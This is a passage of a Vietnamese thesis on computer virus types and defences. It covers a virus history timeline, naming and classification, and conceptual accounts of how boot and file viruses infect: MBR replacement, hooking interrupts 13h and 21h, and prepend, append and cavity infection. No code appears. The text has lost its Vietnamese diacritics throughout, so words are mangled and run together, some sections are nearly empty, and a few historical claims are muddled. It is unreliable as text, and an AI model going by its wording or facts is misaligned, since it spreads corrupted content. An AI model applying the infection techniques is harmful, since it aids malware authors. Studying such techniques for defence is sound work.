mot so dang virus may tinh va phuong phap phong chong

8/13/2019 Mot So Dang Virus May Tinh Va Phuong Phap Phong Chong

1/68

1

Mc lc

M u.............................................................................................. 3

Li cm n........................................................................................ 4

Chng 1.TNG QUAN V VIRUS MY TNH ...................... 5

1.1. GII THIU V VIRUS MY TNH...5

1.1.1. Virus my tnh v cc tnh cht................................................... 5

1.1.2. Tn ca virus my tnh................................................................. 9

1.1.3. Phn loi virus my tnh............................................................. 11

1.2. BOOT VIRUS.15

1.2.1. Phng php ly lan................................................................... 15

1.2.2. Phn loi Boot Virus................................................................... 16

1.2.3. Cu trc chng trnh B-Virus ................................................. 18

1.3. VIRUS FILE...20

1.3.1. Phng php ly lan................................................................... 20

1.3.2. Phn loi F-Virus ....................................................................... 21

1.3.3. Cu trc chng trnh F-Virus.................................................. 21

1.4. VIRUS MACRO.23

1.4.1. nh ngha.................................................................................... 23

1.4.2. Virus Macro W97M/Antivi.a ..................................................... 24

1.5. TROJAN..26

1.5.1. nh ngha Trojan....................................................................... 261.5.2. Phng php ly nhim Trojan................................................. 26

1.5.3. S nguy him ca Trojan.......................................................... 28

1.5.4. Phn loi Trojan.......................................................................... 28

1.5.5. Mc ch ca Trojan................................................................... 29

1.5.6. Phng thc hot ng ca Trojan.......................................... 30

1.5.7. Cng ca mt s Trojan thng dng......................................... 31

1.6. INTERNET WORM..321.6.1. Gii thiu chung.......................................................................... 32


2/68

2

1.6.2. Cc giai on pht trin ca su Internet................................ 35

Chng 2.NHN DNG V PHT HIN VIRUS.................. 44

2.1. K THUT NHN DNG VIRUS..44

2.1.1. Nhn dng chnh xc mu (Signature based delection).......... 44

2.1.2. Nhn dng theo m i din...................................................... 45

2.1.3. Scan theo string ........................................................................... 46

2.1.4. Nhn dng hnh vi ng ng..................................................... 48

2.1.5. Kimsot lin tc........................................................................ 49

2.1.6. Kt hp cc phng thc........................................................... 49

2.2. PHNG PHP PHT HIN VIRUS50

2.2.1. Qut (scanner) ............................................................................. 50

2.2.2. Checksum (kim tra tng).......................................................... 50

2.2.3. Guard (canh phng) .................................................................... 51

Chng 3.PHNG CHNG VIRUS.......................................... 52

3.1. D TM TRONG B NH...52

1/. i vi B-Virus:................................................................................ 52

2/. i vi RF-Virus: ............................................................................. 533.2. DIT VIRUS V KHI PHC D LIU..53

3.2.1. B-Virus ......................................................................................... 53

3.2.2. F- Virus ........................................................................................ 54

3.2.3. Virus Trojan ................................................................................ 55

3.2.4. Su Worm .................................................................................... 57

3.3. TO VIRUS MY TNH..58

Kt lun........................................................................................... 68


3/68

3

M uVirus tin hc hin nay ang l ni bn khon lo lng ca nhng ngi

lm cng tc tin hc, l ni lo sca nhng ngi sdng khi my tnh ca

mnh bnhim virus. Khi my tnh ca mnh bnhim virus, hchbit trngchvo cc phn mm dit virus hin c trn thtrng, trong trng hp cc

phn mm ny khng pht hin hoc khng tiu dit c, hblm phi tnh

hung rt kh khn, khng bit phi lm nhthno.

V l do , c mt cch nhn nhn c bn v h thng, c ch v cc

nguyn tc hot ng ca virus tin hc l cn thit. Trn c s , c mt cch

nhn ng n v virus tin hctrong vic phng chng, kim tra, cha tr cng

nh cch phn tch, nghin cu mt virus mi xut hin.

ng vi mi h iu hnh u c nhng loi virus hot ng ring trn

n nh ng vi h iu hnh DOS ta c virus DOS, ng vi h iu hnh

Windows ta c virus Windows. V s pht trin ca tin hc gn lin vi n l

s pht trin ca virus tin hc mi khi c mt phn mm, mt chng trnh,

mt h iu hnh mi xut hin th virus mi cng xut hin theo v ko theo

l chng trnh dit virus. V vy vic nghin cu, nhn dng v pht hin

virus t c bin php thch hp ngn chn v phng tr virus t kt

qu cao nht.


4/68

4

Li cm n

Em xin by t lng knh trng v bit n su sc ti PSG.TS Trnh Nht

Tin, cc gio vin b mn khoa cng ngh thng tin, i hc Dn Lp HiPhng hng dn v ng vin em trong qu trnh lm lun vn ny.

Em xin cm n cc thy c gio trong trng to iu kin gip em

hon thnh lun vn ny. Em xin gi li cm n ti gia nh bn b gip

ng vin to iu kin cho em trong qu trnh lm lun vn.

V thi gian khng nhiu, kinh nghim cn hn ch, khng trnh khi cc

thiu st. Em mong nhn c cc kin ng gp ca cc thy c v bn b

Em xin chn thnh cm n


5/68

5

Chng1.TNG QUAN V VIRUS MY TNH

pht hin v dit c virus tin hc th trc ht phi hiu r bn cht

ca chng. V nguyn tc chung, cng vic dit virus tin hc a phn l lm

ngc li nhng g m virus lm. V vy, chng ny tp trung nghin cu

nhng ni dung lin quan n c ch hot ng ca virus lm r bn cht

ca virus tin hc. T c th xy dng chng trnh tm v dit virus.

1.1. GII THIU V VIRUS MY TNH

1.1.1. Virus my tnh v cc tnh cht

1.1.1.1.Khi nimVirus my

, i kh

tnh -

.

.

1.1.1.2. Cc tnh cht

Tnh ly lan: y l tnh cht quan trng nht i vi tt c cc loi virus.Kh nng ly lan th hin sc mnh ca virus. y l im phn bit virus vi

mt s chng trnh xu khc cng c kh nng ph hoi d liu v my tnh

nhng khng t ly lan c.

Tnh n: tnh cht ny lm cho virus trnh c s pht hin ca cc

chng trnh anti-virus v tng tc ly nhim, m bo s tn ti ca n.

Virus c th gim ti a kch thc ca mnh bng cch ti u ho m lnh can hoc s dng mt s gii thut t nn v gii nn. Tuy nhin, iu ny cng


6/68

6

c ngha l virus phi gim phc tp ca n, d dng cho cc lp trnh vin

phn tch m lnh.

Tnh ph hoi: tnh cht ny c th khng c mt s loi virus v n

gin chng ch c vit ra th gin hoc kim nghim kh nng ly lan

m thi. Tuy nhin, nhiu loi virus c kh nng ph hoi rt cao.

1.1.1.3.Lch s pht trin ca virus my tnh

Virus my tnh c mt qu trnh pht trin kh di, n lun song hnh

cng nhng chic my tnh. Khi m cng ngh phn mm cng nh phn cng

pht trin th virus my tnh cng pht trin theo. H iu hnh thay i th

virus my tnh cng t thay i mnh ph hp vi h iu hnh .C nhiu ti liu khc nhau ni v xut x ca virus my tnh [1,2,3,4].

Tuy nhin, a s cc ti liu ni v xut x ca virus my tnh u lin quan

n s kin tr chi Core War.

1983Nguyn l ca tr chi Core War

Core War l mt cuc u tr gia hai on chng trnh my tnh do hai

lp trnh vin vit ra. Mi u th s a mt chng trnh c kh nng t ti

to gi l Orgnaism vo b nh my tnh. Khi bt u cuc chi, mi u th

s c gng ph hy Organism ca i phng v ti to Organism ca mnh.

u th thng cuc l u th t nhn bn c nhiu nht.

Tr chi Core Warc gi kn n nm 1983, Ken Thompson ngi

vit phin bn u tin cho h iu hnh UNIX, l ra khi nhn mt trong

nhng gii thng danh d ca gii in ton- gii thng A.M Turing. Trong

bi din vn ca mnh ng a ra mt tng v virus my tnh da trn tr

chi corewar. Cng nm 1983, tin s Frederik Cohen chng minh c s

tn ti ca virus my tnh.

Thng 5 nm 1984 t bo Scientific America c ng m t v core

war v cung cp cho c gi nhng thng tin hng dn v tr chi ny, k t

virus my tnh xut hin v i km theo n l cuc chin gia nhng vit ra

virus v nhng ngi dit virus.


7/68

7

1986Virus Brain

C th coi y l virus my tnh u tin trn th gii, Brain b mt thm

nhp t Pakistan vo nc M vi mc tiu u tin l trng i hc

Delaware. Mt ni khc trn th gii cng m t s xut hin ca virus, l trng i hc Hebrew Israel.

1987Virus Lehigh

Lehigh l tn ca virus xut hin nm 1987 ti trng i hc cng tn.

Trong thi gian ny cng c mt s virus khc xut hin, c bit l WORM

virus (su virus), cn c mng vi cc h thng my ch xut hin. Virus

Jerusalem gy thit hi cho cng ty IBM vi tc ly lan ng n: 500000

nhn bn trong 1 gi.

1988Virus ly lan trn mng

Ngy 2/11/1988, Robert Morris a virus vo mng my tnh quan trng

nht ca M, gy thit hi ln. T tr i ngi ta bt u thy c tnh

nguy hi ca virus my tnh.

1989Virus AIDS Trojan

Xut hin Trojan hay cn gi l con nga thnh T roa , chng khng

phi lvirus my tnh, nhng lun i cng vi khi nim virus. Nhng con

Trojan ny khi gn vo my tnh th n s ly cp mt s thng tintrn

v gi n mt a ch m ch ca ch nga ny mun vn chuyn n, hoc

n gin ch l ph hy d liu trn my tnh .

1991Virus Tequila

y l loi virus u tin m th gii chuyn mn gi l virus a hnh.y thc s l loi virus gy au u cho nhng ngi dit virus v qu tht

khng d dng g dit chng. Chng c kh nng t thay i hnh dng sau

mi ln ly nhim, lm cho vic pht hin ra chng rt kh khn.

1992- Virus Michelangelo

Tip ni s ra i ca virus a hnh nm 1991, trong nm, 1992 sc mnh

cho cc loi virus my tnh tng nhanh chng mt, nhng ngi vit virus

to ra s a hnh cc phc tp cho mi virus.


8/68

8

1995Virus Concept

Sau gn 10 nm k t ngy virus my tnh u tin xut hin, y l loi

virus u tin c nguyn l hot ng gn nh thay i hon ton so vi virus

trc y.Sau ny nhng virus theo nguyn l ca virus Concept c gi chung l

macro, chng tn cng vo cc h son tho vn bn ca Microsoft (Word,

Excel, Powerpoint) .

1996Virus Boza

Khi hng Microsoft chuyn sang h iu hnh Window95 v h cho rng

virus khng th tn cng c, th nm 1996 xut hin virus Boza ly nhimc trn h iu hnh Windows.

1999Virus Melissa, Bubbleboy

Mt bc pht trin mi ca virus, su Mellisa khng nhng kt hp cc

tnh nng ca su Internet v virus marco m n cn khai thc c mt cng

c thng s dng hng ngy l Microsoft Outlook Express. Khi mt my tnh

b nhim su Mellisa, n s t pht tn mnh i m ch nhn my tnh khng h

hay bit.

Trong bn ngy, su Mellisa ly nhim 250 ngn my tnh trn th

gii thng qua Internet, trong c VitNam, gy thit hi hng trm triu

USD. Su Mellisa chng minh Internet l mt phng tin hu hiu virus

my tnh c th ly lan trn ton cu trong vi ting ng h.

Nm 1999, ngoi su Mellisa, virus Chernobyl hay cn gi l CIH ph

hy d liu ca hng triu my tnh trn th gii, gy thit hi gn 1 t USD

vo ngy 26/4/1999.

Nm 2000 Virus Dos, Love Letter

C th coi y l v vic virus ph hoi ln nht t trc ti nay, Love

Letter c xut x t Philippines do mt sinh vin nc ny to ra, ch trong

vng su ting ng h ly nhim ti 20 nc trn th gii trong c Vit

Nam, ly nhim 55 triu my tnh gy thit hi 8,7 t USD.


9/68

9

Cn Dos (Denial of Service), nhng virus ny pht tn i khp ni, nm

vng nhng ni n ly nhim.Cui cng chng ng lot tn cng theo kiu

t chi dch v (Denial of Service yu cu lin tc, t nhiu my tnh ng

thi, lm cho cc my ch b tn cng khng th phc v c na v dn nt chi cc yu cu mi) vo cc h thng my ch khi ngi iu hnh n ra

lnh, hoc vo cng mt thi im nh trc. Mt h thng in thoi ca Ty

Ban Nha l ni b tn cng u tin.

2001Virus Winux Windows/Linux, Nimda, Code Red

Winux Windows/Linux virus nh du nhng virus c th ly c trn

h iu hnh Linux.

Nimda, Code Red l nhng virus tn cng cc i tng ca n bng

nhiu con ng khc nhau (t my ch sang my ch hoc t my ch sang

my trm), cho n thng 9/2002 Vit Nam vn cn nhng c quan vi

mng my tnh c hng trm my tnh vn b nhim virus Nimda. Chng ch ra

mt xu hng mi ca cc loi virus my tnh l tt c trong mt, trong mt

virus bao gm nhiu virus.

2002S i ca hng lot loi virus mi

Thng 1/2002, virus ly nhim nhng file .SWF. Thng 3/2002 su

SharpA (vit bng ngn ng C# ra i). Thng 5/2002 SQLSpider ra i v

chng tn cng cc chng trnh dng SQL. Perrun ly nhng file nh .JPEG.

Scalper tn cng cc FreeBSD/Apache Web server.

1.1.2. Tn ca virus my tnh

Tn ca virus ni chung thng c t bi nh nghin cu u tin gpvirus . Vn l nhiu nh nghin cu c th cng gp nhng virus mi

ging nhau nhng cch t tn ca mi ngi th li khc nhau.

Vic cc cng ty phn mm an ninh cnh tranh nhau c l n v

u tin t tn cho mt loi virus mi dn n tnh trng ph bin hin nay,

virus thng c gi bng nhiu danh tnh khc nhau.


10/68

10

Bt ng v tn v cch t tn nhng loi virus to ra nhng iu kh

hiu trong lnh vc ny, t dn n nhng kh khn trongbin php i ph

v gp phn gip cho virus d dng pht tn. y cng l ch c a ra

tho lun ti hi ngh ton cu v chng virus (Virus Bulletin 2003) t chc tiToronto-Canada cui thng 9/2003.

Vo u thp k 1990 c mt h thng quy c cch t tn do T

chc nghin cu virus my tnh (CARO) xut. Chnh thc c a ra nm

1991 v thnh thong c b sung thm vo, h thng ny ra nhng

nguyn tc v nhng g c th v khng th s dng trong vic t tn cho

virus, ng thi thit lp mt h thng cc c trng ca virus nh mc

nguy him, nn b tc ng, h hng ca n Nick Fitzgerald, i din ca

CARO, khi pht biu v h thng t tn hin nay cho bit nhng nguyn tc

ca h vn c hiu lc.

Kiu t tn mang tnh k thut th quan trng i vi cc chuyn gia

virus, h c th bit c con virus thuc loi no, phin bn th my,

thng qua tn gi ca virus. Nhng iu li khng qua trng vi hu ht

nhng ngi s dng my tnh, nhng ngi thng c xu hng nh tn virus

nh: I Love You v Mellisa (nh tn theo nhng s kin) thay

v VBS.LoveLetter.A v W97.Mellisa.A. Tm li: bt ng trong vic t tn

cho virus ca nhng nh nghin cu hay cng ty phn mm an ninh mng to

ra cho virus cng loi nhiu tn khc nhau. iu to ra s ln ln cho mi

ngi nhng i vi phn mm dit virus ch xem xt nhng c im, du

hiu nhn bit ca virus m khng h quan tm n tn ca chng trong vic

dit virus.


11/68

11

1.1.3. Phn loi virus my tnh

Mt cch tng i, Virus tin hc c chia ra thanh nm loi [1]:

Loi 1:Virus Boot (B-Virus)

V mi trng ly nhim ca chng trn Boot Record ca a mm vMaster Boot Record hoc Boot Record ca a cng, vng cha mt on m

dng khi ng my tnh. Virus loi ny c kch hot mi khi my tnh

khi ng t mt a t b nhim chng. Khi c nh thc dy th chng s

tin hnh thng tr trong b nh, lng l ch c hi ly lan sang cc a khc

thng qua qu trnh truy nhp a.

Loi 2: Virus File(F-Virus)Thng ly nhim cc file kh thi .EXE, .COM, .DLL, .BIN, .SYS....

Loi virus ny hot ng khi cc file kh thi b nhim virus c thi hnh v

ngay lp tc chng s tm cch ly nhim hoc tin hnh thng tr trong b

nh v ch c hi ly nhim sangcc file kh thi khc.

Loi 3: Virus Marco

Loi ny khc vi loi virus F-Virus truyn thng ch i tng ly

nhim ca chng khng phi l chng trnh kh thi m l cc file vn bn,

bng tnhca cc phn mm ng dng c trang b ngn ng marco phctp

to ra nh Microsoft Excel nm trong b phn mm Office ca hng Microsoft.

Khi cc tp tin vn bn (hoc cc tp tin Excel) ny c x l bi Microsoft

Word (hoc Microsoft Excel), Marco Virus s c kch hot, tm cch ly lan

sang cc file Word, Excel khc.

Loi 4: Virus TrojanThut ng ny da vo mt in tch c, l cuc chin gia ngi Hy

Lp v ngi thnh T-roa. Thnh T-roa l mt thnh tr kin c, qun Hy

Lp khng sao c th t nhp vo c. Ngi ta ngh ra mt k, gi v

ging ho, sau tng thnh T-roa mt con nga g khng l. Sau khi nga

c a vo trong thnh, m xung nhng qun lnh t trong bng nga

xng ra v nh chim thnh t bn trong


12/68

12

Phng php trn cng chnh l cch m cc Trojan my tnh p dng.

u tin hacker bng cch no la cho nn nhn s dng chng trnh ca

mnh. Khi chng trnh ny chy th v b ngoi cng ging nh nhng

chng trnh bnh thng. Tuy nhin, song song vi qu trnh , mt phn caTrojan s b mt ci ln my nn nhn.n mt thi im nh trc no

chng trnh ny thc hin vic xa d liu, hay gi nhng thng ip m

hacker mun ly n mt a ch nh trc trn mng.

Khc vi virus, Trojan l mt on m chng trnh hon ton khng c

tnh cht ly lan. N ch c th c ci t khi c kch hot v ly nhim

c sang my tnh khc khi c ngi c gi i, cn virus th t ng tm

kim nn nhn ly lan.

Thng thng cc phn mm c cha Trojan c phn phi nh l cc

phn mm tin ch, phn mm mi hp dn, nhm d thu ht ngi s dng.

Bn cnh cc Trojan n cp thng tin truyn thng, mt s khi nim mi

c dng t tn cho cc trojan mang tnh cht ring bit nh sau:

BackDoor: L loi trojan (sau khi ci t vo my nn nhn) s t m

ra mt cng dch v cho php k tn cng (hacker) c th kt ni t xa ti my

nn nhn, t n s nhn lnh v thc hin lnh m k tn cng a ra.

Phn mm qung co bt hp php - Adware v phn mm gin ip -

Spyware: Gy kh chu cho ngi dng khi chng c tnh thay i trang web

mc nh (home page), cc trang tm kim mc nh (search page)..hay lin tc

t ng hin ra (pop up) cc trang web qung co khi ta ang duyt web.

Chng thng b mt xm nhp vo my ca takhi ta v tnh gh thm

nhng trang web c ni dung khng lnh mnh, cc trang web b kha phn

mmhoc i theo cc phn mm min ph khng ng tin cy, cc phn mm

b kha (crack, keygen).


13/68

13

Loi 5: Su Internet (Internet Worm)

Su Internet l mt bc tin ng k ca virus. Su Internet kt hp c

s ph hoi ca virus, s b mt ca Trojan v vic ly lan nhanh chng qua

ng mng Internet. Vi tc ly lan nhanh chng chng lm t lit hnglot cc h thng my ch, lm ng truyn trn mng qu ti.

Su Internet thng c tn pht bng cch tm cc a ch trong s a

ch (Address book) ca my m n ang ly nhim, thng l a ch ca

ngi thn, khch hngTip n, n t gi bn sao ca n cho nhng a ch

m n tm thy, a ch ngi gi thngl ch nhn ca my tnh . iu

nguy him l nhng vic ny din ra m ngi s dng khng h hay bit, ch

nhn c thng bo l gi virus cho ngi khc th mi bit rng my tnh

ca mnh b nhim virus.

Vi cch hon ton tng t trn nhng my tnh nn nhn, su Internet

c th nhanh chng ly lan trn ton cu theo cp s nhn, iu gii thch ti

sao ch trong vng vi ting ng h m su Mellisa v su Love Letter li c

th ly lan ti hng chc triu my tnh trn ton cu. Ci tn su Internet th

hin vic nhng con su c th b t my tnh ny qua my tnh khc trn

cc cnh cy Internet

Vi s ly lan nhanh v rng ln nh vy, su Internet thng c k

vit ra chng ci thm nhiu tnh nng c bit, chng hn nh chng cth

nh cng mt ngy gi v ng lot t cc my tnh nn nhn tn cng vo

mt a ch no , rt kh chng v khc phc c hu qu ca nhng

cuc tn cng nh vy. Ngoi ra, nhng con su Internet cn c th cho phpch nhn ca chng truy cp vo my tnh ca nn nhn v lm mi th nh

ngi trn my tnh mt cch hp php.


14/68

14

Khi nim Su Internet cn bao gm cc virus ly lan qua mng chia s

ngang hng peer to peer, cc virus ly lan qua cc dch v chatting v c bit

l cc virus khai thc cc l hng phn mm ly lan. Cc phn mm (nht l

h iu hnh v cc dch v trn ) lun cha ng nhng li tim tng (v d:li trn b m) m khng phi lc no cng c th d dng pht hin ra. Khi

mt l hng phn mm c pht hin,khng lu sau s xut hin cc virus

c kh nng khai thc cc l hng ny ly nhim ln cc my tnh t xa mt

cch m thm m ngi ch my tnh hon ton khng hay bit. T cc my tnh

ny, Worm s tiptc b qua cc my tnh khc trn mng Internet vi mt

cch thc tng t.

Phn loi virus s cung cp cho chng ta mt cch nhn nhn ng n v

virus my tnh, t xy dng phng php hu hiu ngn chn chng.


15/68

15

1.2. BOOT VIRUS

1.2.1. Phng php ly lan

Sau qu trnh POST (Power On Self TestT kim tra khi khi ng)

sector u tin trn a khi ng c c vo b nh ti a ch 0:07C00h,mt tc v kim tra xem c phi l phn Boot hp l khng bng cch kim tra

m nhn dng 0AA55h ti cui sector. Tuy nhin vic kim tra ny khng trnh

khi s h nu ai thay on m Boot bng mt chng trnh khc vi xu.

V y cng chnh l cch ly lan ca mt B-Virus.

i vi a mm, sector u tin lun l Boot sector, do vic ly lan

ch n gin l tin hnh thay th sector ny bng m ca virus.

i vi a cng c chia Partition, vic ly lan li phc tp hn v u

tin Master Boot sector c c vo, sau qu trnh kim tra Partition hot

ng, Boot sector tng ng mi c c vo. Chnh v vy ngi vit ra

virus c th chn mt trong hai ni lu gim virus: Master Boot sector hay

Boot sector.

i vi B-Virus c lu tr ti Master thn lun c np vob nh

u tin, cho d sau h iu hnh no c s dng v do n c kh

nng ly lan rt rng. Tuy nhin vn t ra l nhng con virus ny phi bo

ton Partition table v mt xm phmnh n vng ny cng dn n nhng

trc trc v a cng.

i vi Boot sector th c thun li hn trong vic s dng bng tham s

ca a nm trong vng ny, on mly lan cho a mm cng s c dng

tng t cho a cng.

Hai phng php trn u c cc B-Virus sdng, tuy nhin hin

nay hu ht chng u sdng phng php ly vo Master Boot sector.


16/68

16

Vn then cht m loi virus ny cn gii quyt l Boot sector (Master

Boot sector) c ca a. Virus s thc hin vic thay th mt Boot sector mi,

tuy nhin virus khng th thc hin c ht cng vic cho Boot sector (Master

Boot sector) c v trong sector ny c cha thng tin v a v thc s viruskhng th bit mt cch y sector ny s phi lm nhng g. Chnh l do

ny m a s ccB-Virus khng b Boot sector c m virus giBoot sector c

vo mt vng no trn a v sau khi tin hnh xong tc v ci t ca mnh,

n s c v trao quyniu khin cho on m ca sector ny (tuy nhin c

mts con virus thc hin m ca mnh ln on m ca Boot sector c

ch cha thng tin v a m khng ct sector ny i). Mi vic li c Boot

sector c tip tc thi hnh nh bnh thng. Tuy nhin vic la chn ni ct gi

Boot sector cng l mt iu kh khn v mi ni trn a u c th b sa i:

FAT, Root Directory v nht l vng Data. Da vo cch gii quyt vic ct

giu Boot sector c ny B-Virus c th phn thnh hai loi l SB-Virus v DB-

Virus.

1.2.2. Phn loi Boot Virus

Vic ct gi Boot sector c B-Virus gii quyt theo hai hng:

Hng th nhtl virus ct Boot sector c vo mt v tr xc nh trn

mi a v chp nhn ri ro c th b mt sector ny do ghi , d ch ct du

ny c kh nng b ghi thp nht. Hng gii quyt ny n gin v do

chng trnh thng khng ln. Ch dng mt sector thay th Boot sector c v

do loi ny c gi l SB-Virus (Single Boot Virus).

Hngth hail virus c th ct Boot sector ny vo mt v tr an tontrn a trnh mi mt mt c th xy ra. V kch thc vng an ton c th

nh bt k, nn virus thng chim trn nhiu sector v c chia lm hai

phn: mt phn trn Boot sector v mt phn trn vng an ton. V c im

nh vy, loi virus ny c gi l DB-Virus (Double Boot sector).


17/68

17

1/. SB-Virus

Do tnh chp nhn mt mt d liu nn chng trnh ngn gn ch chim

mt sector. Thng thng SB-Virus chn nhng ni m kh nng ghi ln l

t nht ct Boot sector c.i vi a mm, cc ni thng chn l:

-Nhng sector cui cng ca Root Directory v t khi ngi dng khai

thc ht s entry ca th mc gc.

-Nhng sector cui cng ca a v khi phn phi lin cung cho mt tp

tin no , DOS bt u tm lin cung trng t u vng d liu cn c vo

entry ca n trn FAT.

i vi a cng th n gin hn v trn hu ht cc a track 0 ch cha

Master Boot record trn mt sector, cn li cc sector khc trn track ny l b

trng khng dng n. Do , cc SB-Virus v hu ht cc DB-Virus u chn

nhng sector trng trn track ny lm ni n nu.

2/. DB-Virus

- i vi a s cc virus th kch thc 512 byte (thng thng kchthc ca mt sector l 512 bytes) khng phi l qu rng ri. Do h gii

quyt bng cch thay th Boot sector c bngBoot sector gi. Boot sector gi

ny lm nhim v ti tip phn m virus cn li trn a vo b nh r i trao

quyn iu khin. Sau khici t xong phn ny mi ti Boot sector tht vo

b nh. Phn m virus cn lic th c nm mt trong nhng ni:

- i vi a mm: qua mt DOS bng cch dng nhng lin cung cn

trng. Nhng entry tng ng vi cc lin cung ny trn FAT s b nh du l

hng cho DOS s khng s dng n na. Phng php th hai u im

hn l vt ra khi tm kim sot ca DOS bng cch to thm mt track mi

tip theo track cui cng m DOS c th qun l (iu ny ch p dng vi a

mm). Tuy nhin phng php ny c nhc im l c mt s loi a mm

khng c kh nng qun l, khi track mi c thm s gy li khi virus tin hnh

ly lan. Do vy phng php th nht vn c cc virus sdng nhiu hn.


18/68

18

- i vi a cng: m virus c th c ct gi ti nhng sector sau

Master Boot record hoc nhng sector cui ca Partition sau khi gim kch

thc ca Partition i hoc gii quyt tng t nh trn a mm (s dng

nhng lin cung cn trng v nh du nhng lin cung ny trong bng FAT lhng cho DOS khng s dng na).

Ni chung cu trc chng trnh SB-Virus hay DB-Virus l nh nhau.

1.2.3. Cu trc chng trnh B-Virus

Do c im ch c trao quyn iu khin mt ln khi khi ng my,

virus phi tm mi cch tn ti v c kch hot li khi cn thit, ngha l

n ging nh mt chng trnh pop up TSR(Terminate and Stay ResidentKt thc v thng tr). Do vy, chng trnh virus c chia lm hai phn:

phn khi to v phn thn.

Phn khi to

u tin virus tin hnh thng tr bng cch t chp mnh vo vng nh

cao. Sau m bo tnh pop up ca mnh n lun chim ngt 13h. Ngoi

ra, phc v cho cng tc ph hoi, gy nhiuvirus cn c th chim cc

ngt 8,9.Sau khi khi to xong, Boot sector c c tr li ng v tr v

trao quyn iu khin.


19/68

19

Phn thn

L phn quan trng cavirus, cha cc on m m phn ln s thay th

cho cc ngt m n chim. C th chia phn ny thnh bn phn .

+ Phn ly lan:l phn chnh ca thn virus, thay th cho ngt 13h, c tcdng ly lan bng ccht sao chp mnh vo bt ka no cha b nhim.

+ Phn gy nhiu v ngy trang:khi bn cht virus c kho st mt

cch tng tn th vic pht hin v dit virus khng cn l vn phc tp.

Vic gy nhiu to nhiu kh khn cho ngichng virus trong vic tm, dit

virus v phc hi d liu. Vic ngytrang lm cho virus c v b ngoi nh

bnh thng ngi dit virus v s dng my tnh khng pht hin ra chng.+ Phn ph hoi: khng nht thit phi c. Tuy nhin a s cc virus u

c phn ny, hin th ch gy trc chc nh, tru chc ngi dngcn c th

ph hy d liu my tnh. Virus c th ph hoi mt cch ngu nhin hoc

c nh thi.i vi loi virus c nh thi, virus skim tra mt gi tr

(c th virusxc nh ngy, gi, thng, nm, s ln ly, s gi my chy).

Khi gi trny bng hoc vt qua ngng cho php n s tin hnh ph hoi.

+ Phn d liu: ct gi thng tin trung gian, nhng bin ni ti dng

ring cho virus v Boot sector c.


20/68

20

1.3. VIRUS FILE

1.3.1. Phng php ly lan

Virus file truyn thng ni chung ch tin hnh ly lan trn nhng file thi

hnh c (thng l file .com hoc l file .exe). Khi tin hnh ly lan F-Virustruyn thng cng phi tun theo nguyn tc: quyn iu khin phi nm trong

tay virus trc khi virus tr n li cho file b nhim (tuy nhin cng c mt s t

virus li nm quyn iu khin sau mt s lnh no ca file b nhim). Tt

cd liu ca file phi c bo ton sau khi quyn iu khin thuc v file.

Cho n nay F-Virus c mt s phng php ly lan c bn sau:

1/. Chn uThng thng, phng php ny ch p dng i vi cc file dng .COM

ngha l chng trnh lun PSP:100h. Li dng im ny, virus s chn on

m ca n vo u file b ly v y ton b file ny xung pha di ngay sau

n.

u im:m virus d vit v c dng file .COM. Mt khc, s gy kh

khn cho ngi dit trong vn khi phc file v phi c ton b file b

nhim vo b nh ri tin hnh ghi li.

Nhc im: trc khi tr quyn iu khin li cho file phi m bo u

vo l PSP:100h, do phi chuyn ton b chng trnh ln a ch ny.

2/. Ni ui

Phng php ny c thy trn hu ht cc loi F-Virus v phm vi ly

lan ca n rng hn phng php trn. Theo nh tn ca phng php ny m

virus s c gn vo ngay sau file b ly. V do m ca virus khng nm ng

u vo chng trnh cho nn n s nh v li file b ly bng cch thay i

mt s d liu ca file sao cho u vo ch ng vo m ca n.

u im: ly lan trn mi loi file kh thi, thng l file .COM,.EXE,

.BIN, .OVL mt khc, s thay i d liu trn file b ly l khng ng k v

vic ot quyn iu khin khng my kh khn.

Nhc im: d dng cho ngi dit trong vic khi phc d liuv kh

nh v m virus khi ly nhim vo file v kch thc file bly l bt k.


21/68

21

3/. vng trng

Phng php ny nhm khc phc nhc im lm tng kch thc file

b ly nhim (mt s h m t virus d b pht hin) ca hai phng php

trn. Theo phng php ny virus s tm nhng vng trng trong file righi m ca n vo y.

u im: gy kh khn trong vic pht hin v dit virus.

Nhc im: kh khn trong vic vit m virus v kh nng ly lan hp

v rt t file c vng trng cho virus ghi .

1.3.2. Phn loi F-Virus

TF Virus (Transient File Virus) :Virus loi ny khng thng tr, khng chim cc ngt, khi file b ly

nhim c thi hnh n s chim quyn iu khin v tranh th tm cch ly

lan sang cc file khc cng nhiu cng tt.

RF Virus (Residen File Virus) :

Virus loi ny thng tr bng nhiuk thut khc nhau, chn cc ngt

m trng tm ngt l 21h, khi ngt ny c thi hnh ng vi cc chc nng

nht nh v file th n s tin hnh ly lan.

1.3.3. Cu trc chng trnh F-Virus

1/. TF-Virus :

Bao gm bn phn: ly lan, gy nhiu, ph hoi v d liu.

Phn ly lan: l phn chnh ca virus, c tc dng ly lan bng cch t

sao chp mnh gn vo cc file khc m n tm thy khi c quyn iu khin.

Do loi ny khng thng tr nn n tm cch ly lan cng nhiu file cng tt

khi nm quyn iukhin.

Phn gy nhiu: l cng vic lm cho m virus tr nn phc tp kh hiu

to nhiu kh khn cho nhng nh chng virus trong vic tm, dit virus v

phc hi d liu.


22/68

22

Phn ph hoi: tng t nh B Virus

Phn d liu: ct gi nhng thng tin trung gian, nhng bin ni ti

dng ring cho virus v cc d liu ca file b ly, cc d liu ny s c khi

phc cho file trc khi trao li quyn iu khin cho file.

2/. RF-Virus :

V thng tr v chn ngt nh B-Virus cho nn loi ny cng bao gm

hai phn chnh: phn khi to v phn thn.

Phn khi to: u tin virus tin hnh thng tr bng cch t chp mnh

vo b nh hoc dng cc chc nng thng tr ca DOS. Sau m bo

tnh pop up ca mnh n s lun chim ngt 21h. Ngoi ra, phcv chovicph hoi, gy nhiu, virus cn c th chim cc ngt 8,9,13h Sau khi

khi to xong, n s tr li d liu c v quyn iu khin cho file b ly

nhim.

Phn thn: phn ny c cu trc tng t nh TF-Virus, cng c bn

phn: ly lan, gy nhiu, ph hoi v phn d liu. Nhng v loi virus ny

thng tr nn phn ly lan s thc hin trn nhng file yu cu c s dng

ngt 21h ( b virus chim). Phn gy nhiu ngy trang cng phc tp tinh vi

hn TF-Virus v n c th gim st h thng khi thng tr.


23/68

23

1.4. VIRUS MACRO

1.4.1. nh ngha

V bn cht virus macro l mt hoc mt s macro (c vit bng ngnng WordBasic, ExcelBasic, Visual Baisic) c kh nng kch hot v tin

hnh ly lan khi ngi dng x l file c tnti chng. i tng ly nhim

u tin ca cc virus marco l nhng file template ngm nh c np u

tin mi khi Word hoc Excel khi ng (i vi Word l file

NORMAL.DOT) v t y chng tip tc ly lan sang nhng file khc trong

